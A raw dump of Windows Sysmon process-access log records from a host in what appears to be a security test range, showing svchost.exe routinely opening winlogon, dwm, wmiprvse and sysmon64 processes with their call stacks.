b9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 